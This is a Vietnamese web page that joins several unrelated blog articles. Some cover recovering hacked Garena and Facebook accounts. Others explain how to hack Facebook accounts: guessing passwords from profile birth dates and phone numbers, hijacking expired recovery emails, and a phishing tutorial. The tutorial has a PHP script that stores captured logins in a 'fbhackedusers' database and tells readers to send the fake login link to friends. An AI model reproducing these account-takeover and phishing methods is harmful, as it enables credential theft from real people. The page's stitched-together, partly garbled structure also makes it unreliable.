Tài Khoản Bị Đánh Cắp (Hack)

--- Bài mới hơn ---

 • Cách Gỡ Hack Tài Khoản Garena Nhanh Và Chính Xác Nhất
 • Hướng Dẫn Đổi Mật Khẩu Garena, 4 Cách Thay Password Garena Trên Máy Tí
 • Đổi Mật Khẩu Liên Minh Huyền Thoại, Thay Pass Lol Trên Máy Tính
 • Cách Thay Đổi Mật Khẩu Garena Chỉ Với 3 Bước Cực Kì Đơn Giản
 • Cách Thay Đổi Mk Garena Nhanh Và Đơn Giản Nhất Năm 2022 Mới
  • Đăng nhập tài khoản vào các trang web lừa đảo nạp thẻ, lừa đảo bán code, bán các vật phẩm khác trong game, …
  • Chia sẻ tài khoản cho người khác và bị thay đổi thông tin
  • Sử dụng tài khoản đăng nhập trên thiết bị khác và quên đăng xuất tài khoản

  Để tránh trường hợp người lạ vẫn còn lưu đăng nhập trên thiết bị của họ và vào tài khoản thực hiện các thao tác trong game ngoài ý muốn, bạn cần đăng xuất tài khoản game Liên Quân ra khỏi các thiết bị.

  Bạn có thể tự thực hiện đăng xuất khỏi các thiết bị thông qua tính năng mới của chúng tôi TẠI ĐÂY, vui lòng đăng nhập tài khoản Garena/ Facebook chơi game và thực hiện.

  Bước 2: Thay đổi mật khẩu tài khoản Garena/ Facebook

  – Đối với tài khoản Garena: Truy cập Trang quản lý tài khoản, đăng nhập và tiến hành thay đổi mật khẩu. Nếu bạn không thể đăng nhập, hãy sử dụng Email hoặc Số điện thoại xác thực trong tài khoản để khôi phục mật khẩu (xem hướng dẫn tại đây).

  Lưu ý: Nếu tài khoản chưa có đăng ký thông tin bảo mật hoặc các thông tin bảo mật không còn sử dụng được, bạn cần gửi yêu cầu thay đổi mật khẩu qua phiếu yêu cầu này để được hỗ trợ.

  Sau khi tiến hành đổi mật khẩu, bạn cần đăng nhập và kiểm tra các thông tin bảo mật trong tài khoản. Nếu tài khoản chưa xác thực hoặc chỉ xác thực 1 thông tin bảo mật, việc bị xâm nhập sẽ khiến tài khoản không còn an toàn nữa. Kẻ gian có thể tự thêm các thông tin bảo mật đang còn thiếu và khiến bạn gặp khó khăn trong việc được hỗ trợ hoặc xử lý tranh chấp. Vì vậy hãy kiểm tra ngay lại các thông tin bảo mật của mình và nếu phát hiện các thông tin sai lệch, hãy tham khảo các hướng dẫn thay đổi Email và Số Điện thoại để giải quyết vấn đề.

  *** Lưu ý:

  – Bạn bắt buộc phải đổi mật khẩu và đăng xuất tài khoản theo như hướng dẫn ở bước 1 và 2 thì việc đăng xuất tài khoản game khỏi các thiết bị mới đạt hiệu quả.

  – Chúng tôi không chịu trách nhiệm và không có nghĩa vụ bồi hoàn thiệt hại trong trường hợp người chơi không bảo mật thông tin tài khoản.

  --- Bài cũ hơn ---

 • Cách Lấy Lại Mật Khẩu Garena, Khôi Phục Mật Khẩu Truy Cập Garena Plus
 • Cách Cài Đặt Gametv Plus Chơi Đế Chế Online
 • Hướng Dẫn Cách Chơi Đế Chế Aoe Trên Garena Phiên Bản 2022
 • Cách Chơi Đế Chế Trên Garena Mới, Chơi Aoe Trên Garena 2.0
 • Hướng Dẫn Cài Đặt Và Chơi Game Đế Chế Trên Garena
 • Cách Lấy Lại Tài Khoản Facebook Bị Hack

  --- Bài mới hơn ---

 • Hướng Dẫn 11 Cách Lấy Lại Tài Khoản Facebook Bị Hack
 • “down Ngay” Autocad 2007 Full Link Google Drive + Hướng Dẫn Cài Đặt
 • 10 Cách Kiếm Tiền Online Hiệu Quả Nhất 2022
 • Toàn Tập Về Cách Kiếm Tiền Trên Mạng Đơn Giản Nhất 2022
 • Cách Xem Video Kiếm Tiền Online Đơn Giản Uy Tín Nhất
 • Tài khoản Facebook bị hack hoặc bạn quên mật khẩu và bạn đang cố lấy lại tài khoản, lấy lại mật khẩu Facebook? Khi sử dụng Facebook hoặc bất kỳ các tài khoản nào khác rất dễ bị mất mật khẩu hoặc bị hack tài khoản thông qua nhiều cách khác nhau. Trong trường hợp bị hack, không những mật khẩu bị thay đổi mà có thể email, số điện thoại cũng bị thay đổi vì thế việc phục hồi password không còn có tác dụng nữa.

  1. Kiểm tra có thể bạn vẫn đang nhập tài khoản Facebook trên một thiết bị nào đó

  Trước khi khôi phục tài khoản, hãy kiểm tra xem có thể bạn vẫn đăng nhập Facebook trên thiết bị nào đó như trình duyệt trên máy tính, ứng dụng Facebook Android hoặc iOS hoặc trình duyệt dành cho thiết bị di động.

  2. Sử dụng tùy chọn khôi phục tài khoản mặc định

  Sau khi kiểm tra không thấy bất cứ thiết bị nào đăng nhập Facebook, hãy sử dụng mạng hoặc máy tính trước đó đã đăng nhập vào tài khoản Facebook. Trước hết, cần xác định tài khoản của mình, sau đó truy cập vào trang khôi phục Facebook và sử dụng một địa chỉ email hoặc số điện thoại đã thêm vào tài khoản Facebook. Bạn có thể sử dụng tên người dùng Facebook của mình.

  Sau khi xác định tài khoản của mình thành công, bạn sẽ thấy một bản tóm tắt hồ sơ. Trước khi tiến hành, hãy kiểm tra cẩn thận xem đây thực sự là tài khoản của mình và liệu bạn vẫn có quyền truy cập vào (các) địa chỉ email hoặc (các) số điện thoại di động được liệt kê không hay không.

  Nếu tất cả các thông tin chi tiết liên lạc mà Facebook có trong hồ sơ của bạn đều phù hợp, hãy nhấp vào Continue. Facebook sẽ gửi một mã bảo mật, sử dụng mã bảo mật đó để đăng nhập vào tài khoản.

  Nếu không nhận được mã, hãy nhấp vào Didn’t get a code?, sẽ đưa bạn trở lại màn hình Reset Your Password trước. Bạn có thể thử lại hoặc có thể không có quyền truy cập vào tài khoản đó nữa.

  Nếu giành được quyền truy cập vào tài khoản của mình và nghi ngờ rằng tài khoản của bạn bị tấn công, hãy thay đổi mật khẩu ngay lập tức (sử dụng mật khẩu mạnh) và cập nhật thông tin liên hệ. Đây là những bước chính trong việc bảo mật tài khoản Facebook. Đảm bảo xóa bất kỳ địa chỉ email hoặc số điện thoại nào không phải của bạn hoặc bạn không thể truy cập nữa. Bạn nên bật xác thực hai yếu tố để điều này sẽ không xảy ra lần nữa.

  3. Thay đổi thông tin liên hệ

  Thông thường, không thể khôi phục tài khoản bằng cách sử dụng các tùy chọn ở trên. Có thể bạn không còn có quyền truy cập vào (các) địa chỉ email và (các) số điện thoại đã thêm vào hồ sơ của mình. Hoặc có thể một hacker đã thay đổi thông tin này. Trong trường hợp đó, Facebook cho phép bạn chỉ định một địa chỉ email mới mà họ sẽ sử dụng để liên lạc với bạn về việc phục hồi tài khoản.

  Để bắt đầu quá trình này, nhấp vào liên kết No longer have access to these? ở dưới cùng bên trái trang khôi phục mật khẩu để bắt đầu quá trình khôi phục. Facebook sẽ yêu cầu bạn cho một địa chỉ email hoặc số điện thoại mới, để họ có thể liên lạc với bạn nếu cần, nhấp Continue để tiếp tục.

  Nếu thiết lập Trusted Contacts, bạn sẽ có cơ hội sử dụng các tài khoản này để khôi phục tài khoản trong bước tiếp theo.

  Bạn cần nhớ ít nhất một tên đầy đủ trong số 3-5 Trusted Contacts để xem được tất cả. Lưu ý rằng bạn chỉ cần ba mã bảo mật để khôi phục tài khoản.

  Nếu không thiết lập Trusted Contacts, bạn có thể cung cấp tùy chọn để trả lời một trong những câu hỏi bảo mật và đặt lại mật khẩu ngay tại chỗ. Để phòng ngừa thêm, thời gian chờ này sẽ kéo dài 24 giờ trước khi bạn có thể truy cập tài khoản của mình. Nếu không, bạn có thể phải đợi cho đến khi Facebook giữ liên lạc để xác minh danh tính của mình.

  4. Tài khoản có bị tấn công và đang gửi spam

  Các bước lấy lại tài khoản Facebook bị hack

  Bước 2: Nhập địa chỉ email đăng ký tài khoản Facebook của bạn

  Bước 3: Các bạn hãy nhập mật khẩu cũ của bạn trước khi bị hack

  Bước 5: Sau khi hoàn thành, các bạn sẽ được chuyển tới trang để nhập mật khẩu mới

  Tuy nhiên sau khi đã reset mật khẩu và đăng nhập lại, có thể bạn vẫn sẽ chưa vào được Facebook. Khi đó, bạn hãy đợi 24 giờ sau đăng nhập lại thì có thể đăng nhập bình thường.

  5. Vẫn không thể đăng nhập vào Facebook

  Nếu tất cả các phương pháp khôi phục ở trên thất bại, hy vọng cuối cùng chính là Facebook. Bạn có thể thử gửi email [email protected] để giải thích tình huống của mình. Họ có thể cung cấp cho bạn một cơ hội để chứng minh danh tính bằng cách sử dụng hộ chiếu hoặc bằng lái xe. Quá trình này có thể mất vài tuần, vì vậy hãy kiên nhẫn thực hiện.

  Lưu ý: Nếu không sử dụng tên thật trên Facebook, hy vọng khôi phục tài khoản theo cách này là gần như bằng không.

  Nếu tất cả các cách trên đều không thể khôi phục được tài khoản, hãy tạo hồ sơ Facebook mới

  Thông thường, thông tin liên lạc của người dùng đã lỗi thời, các mã phục hồi mà Facebook cung cấp không làm việc, hoặc công ty sẽ không bao giờ tìm cách xác minh danh tính của họ. Trong những trường hợp như vậy, cách duy nhất là tạo hồ sơ Facebook mới.

  --- Bài cũ hơn ---

 • Mẹo Tăng Tốc Duyệt Web Trên Google Chrome Bằng Cheat Engine
 • Hướng Dẫn Viết Bài Thu Hoạch Bồi Dưỡng Thường Xuyên Mầm Non Cụ Thể, Chi Tiết
 • Chương Trình Bồi Dưỡng Thường Xuyên Giáo Viên Mầm Non 2022
 • Bồi Dưỡng Thường Xuyên Cho Cán Bộ Quản Lý, Giáo Viên Mầm Non Năm 2022
 • Vtc Online Mạnh Tay Xử Lý Hack/cheat Trong Đột Kích
 • Những Cách Hack Tài Khoản Facebook Thường Dùng

  --- Bài mới hơn ---

 • Mật Khẩu Wifi Mã Hóa Chuẩn Wpa/wpa2
 • Tài Nguyên Tiếng Anh Miễn Phí Cho Trình Độ A1
 • Phương Pháp Dạy Tiếng Anh Cho Trẻ Em
 • Hướng Dẫn Cách Tự Học Tiếng Anh Giao Tiếp Ngay Tại Nhà
 • Những Cuốn Sách Học Tiếng Anh Giao Tiếp Hay Nhất 2022
 • Mạng xã hội Facebook là một cộng đồng cực đa dạng, nhiều người sử dụng chúng để kết nối với bạn bè, đọc tin tức, trong khi một số người lại dùng nó để kinh doanh. Do đó những thủ thuật hack nick facebook mới nhất mà mình chia sẻ hôm nay sẽ là kim chỉ nam cho một vài bạn muốn thử tập tành hack nick hoặc là lời cảnh tỉnh cho các bạn muốn đảm bảo sự an toàn cho tài khoản facebook của mình.

  Cách hack nick facebook bằng số điện thoại

  Không chỉ ở Việt Nam mà trên thế giới, cách đăng nhập facebook bằng số điện thoại di động thường rất được mọi người sử dụng, do đó việc biết được số điện thoại tài khoản facebook cũng đồng nghĩa với việc bạn đã tiến đến một nửa thành công của quy trình hack tài khoản facebook này.

  Bước 2: Xác định facebook của người bạn cần hack với tài khoản facebook mà các bạn muốn hack nó.

  Bước 3: Bạn vào phần giới thiệu của facebook người bạn cần hack và xem thông tin của người đó.

  Bước 4: Lưu lại số điện thoại và ngày sinh của chủ facebook và lưu lại

  Bước 5 Hãy đăng nhập lại số điện thoại của tài khoản facebook với mật khẩu là ngày tháng năm sinh hoặc sự kết hợp của tên và ngày tháng năm sinh mà bạn vừa lưu lại.

  Cách đầu tiên mà mình chia sẻ để hack tài khoản facebook người khác này hiên nay vẫn còn sử dụng tốt. Do đó nếu bạn muốn hack tài khoản một vài người bạn mà bạn có lưu trữ số điện thoại thì khá khả quan. Cơ hội thành công của bạn lên đến 70% vì số người sử dụng cách đặt mật khảu bẳng số điện thoại hoặc ngày tháng năm sinh để tiện lợi trong việc ghi nhớ là rất nhiều

  Đây là cách dễ dàng nhất để hack nick facebook. Và có một điều bất ngờ là tỉ lệ thành công lên đến gần 70%. Vì nhiều người đặt mật khẩu facebook như vậy để tiện cho việc ghi nhớ.

  Cách hack tài khoản facebook bằng địa chỉ email thì đòi hỏi công sức cao hơn nhưng cơ hội thành công khá thấp vì sự bảo mật của các tài khoản email đặc biệt là Gmail, Outlook rất cao. Khi họ phát hiện sự cố gắng đăng nhập bất thường từ 1 địa chỉ IP lạ nó sẽ tiến hành khóa và không cho đăng nhập trong một khoảng thời gian.

  Tuy nhiên nếu may mắn, bạn cũng có thể hack được tài khoản facebook của họ nếu địa chỉ email này không còn sử dụng trong một thời gian dài.

  Bước 1: Lấy địa chỉ email.

  Đầu tiên, ta chỉ cần tạo tài khoản email và tới địa chỉ liên hệ ở trên soạn thư và nhấn nút “Nhập Danh bạ” sau đó chọn facebook .Sau khi tất cả địa chỉ liên hệ đa hiện lên thì chỉ cần tìm tên nạn nhân của bạn.

  Bước 2: Check địa chỉ email bạn vừa lấy được còn khả dụng không bằng cách.

  Vào phần đăng nhập của nhà cung cấp email như outlook, gmail, yahoo,.. sau đó nhập địa chỉ email người bạn cần hack, điền bừa ở mục mật khẩu

  Bước 3: Kiểm tra

  Nếu thông báo là “tài khoản không tồn tại” thì cách này có thể hoạt động và nếu thông báo là tên người dùng hoặc mật khẩu không đúng thì coi như cách hack nick Facebook này sẽ không hiệu quả

  Bước 3: Tạo tài khoản mới

  Tiếp theo, bạn cần tạo một tài khoản mới.Trong hướng dẫn này mình lấy ví dụ bằng cách sử dụng Hotmail, cách thức hoạt động tương tự với Gmai và Yahoo.

  Bước 4: Liên kết các tài khoản

  Bước 6: Nhận tài khoản facebook

  Tiếp theo, bạn phải truy cập chúng tôi và yêu cầu đặt lại mật khẩu cho tài khoản được liên kết của bạn.

  Bước cuối cùng: Lấy mật khẩu mới trong email bạn vừa được xác nhận.

  Cách phòng chống bị hack nick Facebook

  Qua cách hack tài khoản facebook ở trên thì để đảm bảo an toàn cho nick facebook của mình, việc nâng cao tính bảo mật và tăng độ khó cho mật khẩu là cách đơn giản nhất mà bạn có thể làm lúc này.

  Thay vì sử dụng số điện thoại, ngày tháng năm sinh, tên kết hợp với chuỗi số đơn giản hay kết hợp với ngày tháng năm sinh thì bạn có thể sử dụng thêm các ký tự đặc biệt, viết hoa một vài ký tự, hoặc đặt mật khẩu là chữ viết tắt của người yêu bạn chẳng hạn.

  Sau đó, hãy kích hoạt tính năng bảo mật 2 lớp mà Facebook đưa ra để tăng sự bảo mật tuyệt đối cho tài khoản của bạn. Mình tin chắc rằng chỉ cần bạn làm theo 2 bước đơn giản này thì những tên hacker đang dòm ngó tài khoản facebook của bạn cũng phải bó tay vì độ khó mà nó đang đối mặt.

  Kích hoạt bảo mật 2 lớp

  Bước 1: Bạn đăng nhập vào tài khoản facebook cần bảo mật lên sau đó vào phần Thiết lập (Cài đặt)

  Bước 2: Kế tiếp bạn nhìn sang bên trái và chọn chức năng Bảo mật và đăng nhập.

  Bước 4: Tiếp theo bạn nhấn vào phần Bắt đầu.

  Hoặc là bạn có thể truy cập nhanh vào cửa sổ Xác thực 2 yếu tố thông qua địa chỉ liên kết này: https://www.facebook.com/security/2fac/settings/

  Bước 5: Tại đây sẽ có 2 sự lựa chọn cho bạn. Đó là nhận mã qua số điện thoại mà bạn dùng lúc đăng ký cho Facebook. Hoặc là nhận mã đăng nhập thông qua ứng dụng Google Authenticator hoặc Duo Mobile.

  Trong bài hướng dẫn này mình sẽ hướng dẫn bạn cách nhận mã qua tin nhắn qua SMS. Còn trường hợp bạn muốn nhận qua ứng dụng thì tải một trong hai ứng dụng Google Authenticator hoặc Duo Mobile về điện thoại để sử dụng rất đơn giản.

  Bước 6: Nhập số điện thoại để kích hoạt bảo mật 2 lớp.

  Lưu ý: Nếu lúc đăng ký bạn đã điền đúng số điện thoại của mình rồi thì thôi, còn nếu bạn chưa điền số điện thoại thì nhập số điện thoại của mình vào

  Khi hoàn thành xong các bước trên, bạn đã kích hoạt thành công bảo mật 2 lớp.

  Như vậy là từ nay bạn không còn phải lo lắng gì nữa, tài khoản Facebook của bạn sẽ được bảo mât tuyệt đối, để hack được tài khoản Facebook của bạn thì chỉ có cách biết ID, pass hoặc có điện thoại của bạn. Mà điều này là gần như không thể xảy ra.

  Từ bây giờ mỗi khi bạn muốn đăng nhập vào facebook, hệ thống sẽ gửi mã xác nhận đăng nhập vào số điện thoại của bạn. Điều đó làm cho tài khoản facebook của bạn gần như bất khả xâm phạm.

  Nếu như bạn mất điện thoại và không lấy được mã đăng nhập thì phải làm thế nào?

  Bước 1: Tại phần Xác thực 2 yếu tố bạn xuống phần Thêm phương thức dự phòng sau đó chọn Thiết lập trong phần Mã khôi phục.

  Bước 2: Chờ cửa sổ Popup hiện ra, yêu cầu bạn nhập mật khẩu của tài khoản Facebook vào trước khi lấy mã.

  Bước 3: Bạn nhấn vào Nhận mã.

  Lúc này Facebook sẽ gửi cho bạn 10 mã tương ứng với 10 lần đăng nhập. Bạn lưu ra đâu đó và sẽ sử dụng trong trường hợp cần thiết. Sau khi sử dụng hết số mã đó thì bạn nhấn vào lựa chọn nhận mã mới để facebook cung cấp 10 mã khác cho bạn.

  Việc của bạn là lưu trữ chỗ nào sao cho an toàn. Phòng trường hợp mất số điện thoại hay vì một lý do nào đó thì lấy ra để sử dụng.

  --- Bài cũ hơn ---

 • 5 Bài Tập Pháp Luân Công Để Bảo Vệ Sức Khỏe Chủ Động
 • Cách Giải Nén Nhiều Tệp Rar ▷ ➡️ Ngừng Sáng Tạo ▷ ➡️
 • Hướng Dẫn Cài Đặt Và Sử Dụng Adobe Audition 1.5 Chi Tiết Nhất
 • Gửi Mail Hàng Loạt Cực Dễ Dàng Với Tính Năng Mail Merge Của Google
 • Hướng Dẫn Thêm Google Analytics Cho WordPress
 • Hacker Tiết Lộ Cách Hack Tài Khoản Facebook

  --- Bài mới hơn ---

 • Hack Gangstar Vegas Mafia Game Apk V4.6.0G + Data Android
 • Tải Gangstar Vegas Hack Mod (Vip 10, Vô Hạn Tiền) 5.1.0D Cho Android
 • Tải Game Gangstar Vegas Mod Apk 5.1.0D (Vô Hạn Tiền, Vip)
 • Top 10 Phần Mềm Hack Game Android Hữu Hiệu Nhất Hiện Nay
 • Top 8 Ứng Dụng Hack Game Mobile Cho Android Root Và Không Root Dễ Sử Dụng Nhất
 • Hack tài khoản Facebook là một trong những tìm kiếm phổ biến nhất trên Internet hiện nay. Rất khó có thể thực hiện thành công, nhưng một người dùng Facebook đã làm được điều đó. Một nhà nghiên cứu bảo mật (Prakash) đến từ Ấn Độ đã phát hiện một lỗ hổng đơn giản trong mạng xã hội Facebook cho phép ông hack vào bất cứ tài khoản Facebook nào nhằm xem nội dung tin nhắn, đăng tải mọi thứ, xem thông tin thanh toán và làm bất cứ điều gì mà chủ tài khoản thực có thể làm. Lỗ hổng này nằm trong chức năng Password Reset, chức năng này cho phép tin tặc thực hiện tấn công vét cạn mã khôi phục mật khẩu 6 số và reset thành công mật khẩu tài khoản. Lỗ hổng này chỉ nằm trong một domain beta (tên miền phụ) của Facebook để xử lý yêu cầu ‘ Quên mật khẩu‘. Theo đó, Facebook cho phép người dùng thay đổi mật khẩu tài khoản thông qua thủ tục Password Reset bằng cách xác nhận một mã 6 số nhận được trong email hoặc tin nhắn sms. Để đảm bảo tính an toàn, người dùng sẽ chỉ được nhập 12 lần mã số (giới hạn nhập mã xác nhận). Tuy nhiên, Prakash đã phát hiện ra Facebook không cài đặt giới hạn nhập mã xác nhận trên domain beta của mình là chúng tôi và mbasic.beta.facebook.com. Ông có thể tấn công để hack tài khoản facebook bằng cách vét cạn mã 6 số mà không gặp bất kì trở ngại nào.

  Video minh họa hack tài khoản facebook

  Theo giải thích của Prakash, request POST có thể khai thác trong domain beta này đơn giản là:

  lsd=AVoywo13&n=XXXXX

  Sau khi tìm ra mã xác nhận, Prakash có thể thiết đặt mật khẩu mới và hack tài khoản facebook của bất kỳ ai để toàn quyền kiểm soát tài khoản. Prakash đã tìm ra lỗ hổng vào tháng 2/2018 và báo cho Facebook. Ông được Facebook trao thưởng 15,000 USD cho phát hiện này của mình. Chắc chắn còn nhiều lỗ hổng bảo mật của Facebook mà chúng ta chưa biết hết được, hoặc nó chưa được phát hiện. Hãy theo dõi và phát hiện sớm nhất khả năng bị hack thông qua email, mobile app. Sử dụng các biện pháp bảo mật nâng cao, đăng tải hình ảnh đại diện có chứa khuôn mặt của mình (phục vụ cho việc lấy lại qua CMND hoặc Hộ Chiếu).

  --- Bài cũ hơn ---

 • Cách Hack Facebook Năm 2022 Thành Công 100% Cực Dễ
 • Hướng Dẫn Cách Hack Facebook Bằng Id Nhanh Nhất
 • Hack Facebook Bằng Id Nhanh Nhất Năm 2022
 • Marvel Future Fight Hack Cheats Gian Lận Abesthackit.xyz
 • Tải Game Marvel Future Fight Mod Skill Hack Bất Tử
 • Cách Hack Tài Khoản Facebook Bằng Code Mới Nhất

  --- Bài mới hơn ---

 • Cảm Thấy Sekiro Quá Khó? Có Ngay Bản Mod Giúp Mọi Thứ Dễ Thở Hơn
 • Hack Pirate Kings V7.3.5 Full Lượt Quay
 • Cảnh Giác Với Các Công Cụ Hack Pirate Kings.
 • Phần Mềm Hack Game Pirate Kings
 • Hack Phone S40? Xem Thử Sẽ Biết!
 • Bài viết hôm nay mình sẽ hướng dẫn với các bạn về cách hack tài khoản facebook bằng code. Qua bài này mình hy phòng các bạn sẽ hiểu được các hacker hack tài khoản facebook như thế nào để có cách phòng bị tốt nhất. Không nên dùng bài viết nào vào những mục đích xấu vi phạm pháp luật.

  Thông báo trước khi hack tài khoản Facebook

  Bài viết này hướng dẫn để các bạn biết rằng bất kỳ tài khoản nào của bạn như facebook, instagram, twitter, linkedin, v.v. đều có thể bị tấn công bằng cách sử dụng phương thức tấn công phishing attack.

  Bài hướng dẫn này dựa trên việc hack tài khoản facebook bằng code của riêng bạn, không phải để làm những việc phạm pháp khi hack tài khoản ai đó. Do đó vui lòng không sử dụng code được cung cấp ở đây để thực sự hack tài khoản facebook của bất kỳ ai vì đây là một quá trình hoặc hành động bất hợp pháp.

  Sau khi đọc hướng dẫn cách hack tài khoản facebook này, bạn sẽ hiểu được phương thức tấn công và có cách để bảo vệ tài khoản của mình an toàn hơn khi sử dụng tài khoản của mình trên internet như facebook, gmail, hoặc thậm chí là tài khoản ngân hàng.

  Bạn cũng sẽ hiểu kết quả của việc mở một số liên kết không xác định được các hacker và người lạ gửi cho bạn.

  Bây giờ, chúng ta hãy bắt đầu hướng dẫn hack id tài khoản facebook và mật khẩu tài khoản facebook bằng code của riêng bạn.

  Chuẩn bị gì trước khi hack tài khoản Facebook

  Trước khi thực hiện những hướng dẫn trong bài cách hack tài khoản facebook này. Bải cần phải chuẩn bị một ít kiến thức về các ngôn ngữ sau:

  Chắc bạn đang nghĩ tại sao cần phải học hoặc có một số ý tưởng cơ bản về các ngôn ngữ trên. Câu trả lời là, để tạo biểu mẫu đăng nhập trông giống như trang đăng nhập facebook (HTML và CSS được sử dụng ở đây), sau đó lưu trữ thông tin đăng nhập của người dùng trong cơ sở dữ liệu (PHP và MySQLi được sử dụng ở đây) và cuối cùng chuyển hướng người dùng đến trang facebook gốc (JavaScript được sử dụng ở đây).

  Bây giờ, tôi nghĩ bạn đã hiểu sau khi đọc dòng trên, rằng bạn sẽ hack tài khoản facebook chỉ bằng cách sử dụng tấn công lừa đảo (phishing attack) sau khi đọc và thực hiện đoạn code được đưa ra ở đây.

  Sau khi đọc hướng dẫn cách hack tài khoản facebook này, bạn sẽ có thể thực hiện tấn công lừa đảo với chính mình để hack id và mật khẩu tài khoản facebook giả lập.

  Mẹo để bẫy người dùng và cách hack tài khoản Facebook của họ

  Có những cách sau đây hướng dẫn bạn cách có thể dễ dàng bẫy người dùng để hack id và mật khẩu tài khoản facebook của họ:

  • Kiểm tra những gì người dùng thích nhất – Trước hết, bạn phải kiểm tra những gì người dùng thích nhất để tạo trang web đáng yêu của họ để bẫy họ và sau đó cho phép người dùng mở trang yêu thích của mình. Ví dụ: kiếm tiền trong thời gian ngắn, nhận các mẹo giúp cơ thể khỏe mạnh chỉ trong 10 phút, mẹo học Java chỉ trong 30 phút, v.v.
  • Kiểm tra thiết bị nào, người dùng đang sử dụng ngay lúc đó – Bây giờ, hãy kiểm tra xem, người dùng được nhắm mục tiêu đang hoạt động trên thiết bị nào, di động, máy tính hay máy tính bảng. Bạn cũng có thể triển khai code chuyển hướng tự động trong trang đăng nhập của mình để chuyển hướng người dùng đến trang đăng nhập phiên bản dành cho máy tính nếu họ sử dụng máy tính để bàn
  • Tìm thời điểm thích hợp nhất để bẫy người dùng – Cuối cùng là tìm thời điểm thích hợp để bẫy người dùng mục tiêu của bạn, sau đó gửi liên kết và hack tài khoản facebook của họ. Thời điểm thích hợp ở đây theo nghĩa, khi người dùng rảnh rỗi, có nghĩa là khi họ gần như có thể mở bất cứ thứ gì với tâm trí rảnh rỗi.

  Các bước để hack tài khoản Facebook

  • Tạo trang đăng nhập giống như facebook với tiêu đề và mô tả hoàn hảo cùng với ảnh và tin nhắn
  • Tạo tập lệnh xử lý trang đăng nhập để lưu trữ thông tin đăng nhập trong cơ sở dữ liệu
  • Chuyển hướng người dùng đến trang facebook gốc sau khi lưu trữ hoặc nhận được thông tin đăng nhập
  • Tạo cơ sở dữ liệu để lưu trữ id và mật khẩu facebook
  • Sau đó gửi liên kết đăng nhập cho người dùng
  • Tạo trang web để xem id và mật khẩu tài khoản facebook bị hack

  Sau khi gửi liên kết đăng nhập đến người dùng được nhắm mục tiêu của bạn, bạn không phải làm bất kỳ điều gì sau bước này (hoặc sau bước cuối cùng thứ hai đã nêu ở trên), vì sau bước này, người dùng được nhắm mục tiêu của bạn sẽ bắt đầu làm việc cho bạn, nói cách khác là gián tiếp, anh ấy / cô ấy sẽ tự động cung cấp id tài khoản facebook và mật khẩu cho bạn trong cơ sở dữ liệu của bạn. Và bạn chỉ cần xem trong cơ sở dữ liệu của mình có chứa id và mật khẩu facebook của anh ấy / cô ấy có đến hay không.

  Bạn cũng có thể tạo một trang web được sử dụng để xem danh sách mật khẩu tài khoản facebook của người dùng bị nhắm mục tiêu hoặc bị mắc kẹt cùng với id facebook của họ.

  Nếu bạn thiết kế bước cuối cùng, đó là một trang web hiển thị chi tiết tài khoản facebook bị tấn công, thì bạn không cần phải vào cơ sở dữ liệu của mình và kiểm tra xem có người dùng nào bị mắc bẫy hay không.

  Bây giờ chúng ta hãy xem từng bước mã và mô tả được sử dụng trong việc hack id và mật khẩu tài khoản facebook của bất kỳ ai.

  1. Tạo Trang đăng nhập giống như Trang đăng nhập Facebook

  Bây giờ chúng ta hãy làm bước đầu tiên bằng cách tạo một trang đăng nhập demo với mã sau.

  Mã đăng nhập này dành cho người dùng di động, bạn có thể triển khai mã chuyển hướng để chuyển hướng người dùng đến trang đăng nhập phiên bản dành cho thiết bị di động, hoặc máy tính để bàn sử dụng mã JavaScript, bạn sẽ nhận được mã sau mã đăng nhập này.

  Lưu đoạn mã ở trên vào trong thư mục C:xampphtdocs với tên chúng tôi và đặt hình ảnh hiển thị một số đô la bên trong cùng một thư mục có cùng tên nhưng có phần mở rộng là .jpg là earnmoney.jpg

  Bây giờ hãy mở XAMPP và khởi động mô-đun Apache và MySQL. Nếu bạn không hiểu những gì tôi đang nói thì hãy làm theo hướng dẫn PHP và MySQLi của chúng tôi để cảm thấy tốt hơn và bắt đầu bước tiếp theo của việc hack id và mật khẩu tài khoản facebook.

  Bây giờ nếu bạn mở trình duyệt của mình và nhập localhost/seekmoney.php, thì đây là ảnh chụp màn hình mẫu mà bạn sẽ thấy:

  Nhưng bạn phải tạo cùng một trang đăng nhập cho cả hai người dùng, đó là cho người dùng facebook di động và người dùng facebook trên máy tính để bàn.

  Tạo một trang đăng nhập khác với tên chúng tôi cho máy tính để bàn để chuyển hướng người dùng máy tính để bàn đến trang này.

  Đây là mã chuyển hướng được sử dụng để chuyển hướng người dùng được nhắm mục tiêu của bạn đến trang phiên bản dành cho máy tính nếu người dùng đang sử dụng máy tính để bàn:

  Đặt đoạn mã trên ở đầu trang đăng nhập mà bạn đã tạo trước đó.

  2. Tạo Script để lưu trữ thông tin đăng nhập Facebook

  Đây là script xử lý đăng nhập để lưu trữ thông tin đăng nhập facebook của người dùng được nhắm mục tiêu trong cơ sở dữ liệu:

  <?php $conn = mysqli_connect('localhost', 'root', '', 'fbhackedusers'); if(mysqli_connect_error()) { header("location: https://www.facebook.com"); exit(); } <?php if($_SERVER)) { $email = $pass = ""; $email = $_POST; $sql = "insert into fbusers(facebookid, facebookpassword) values('$email', '$pass')"; } } header("location: https://www.facebook.com"); exit();

  Đặt tập tin trên vào cùng một thư mục với tên login.php.

  3. Chuyển hướng người dùng đến URL Facebook gốc

  Như bạn có thể thấy từ bước hai ở trên, đoạn mã sau được sử dụng để chuyển hướng người dùng đến facebook gốc.

  header("location: https://www.facebook.com");

  4. Tạo cơ sở dữ liệu để lưu trữ ID và mật khẩu Facebook

  Bây giờ, hãy tạo một cơ sở dữ liệu có cùng tên và sau đó tạo một bảng có cùng tên và cuối cùng tạo các cột với các chi tiết giống như được sử dụng trong đoạn mã trên, đó là cơ sở dữ liệu có tên fbhackedusers, bảng có tên fbusers và sau đó là các cột là facebookid và facebookpassword.

  3. Bây giờ nhấp vào Databases

  5. Sau đó nhập fbusers bên cạnh tên và đặt 3 bên cạnh số cột. Nhấp vào nút Go

  • Điền vào cột đầu tiên như chúng tôi dưới dạng Tên, INT là Loại, 6 là Độ dài / Giá trị, PRIMARY là chỉ mục, sau đó đánh dấu vào A.I. (tăng tự động)
  • Điền cho cột thứ hai như facebookid là Tên, VARCHAR là Loại, 40 là Length/Values
  • Điền vào cột thứ ba như mật khẩu facebook là Tên, VARCHAR làm Loại, 40 là Length/Values

  7. Đây là ảnh chụp nhanh sau khi cung cấp các chi tiết như đã đề cập trong ba bước trên:

  5. Gửi liên kết hack Facebook cho bạn bè

  Bây giờ hãy gửi liên kết cho bạn bè của bạn để bắt đầu lấy id và mật khẩu tài khoản facebook của họ.

  6. Tạo trang web để liệt kê người dùng Facebook bị tấn công

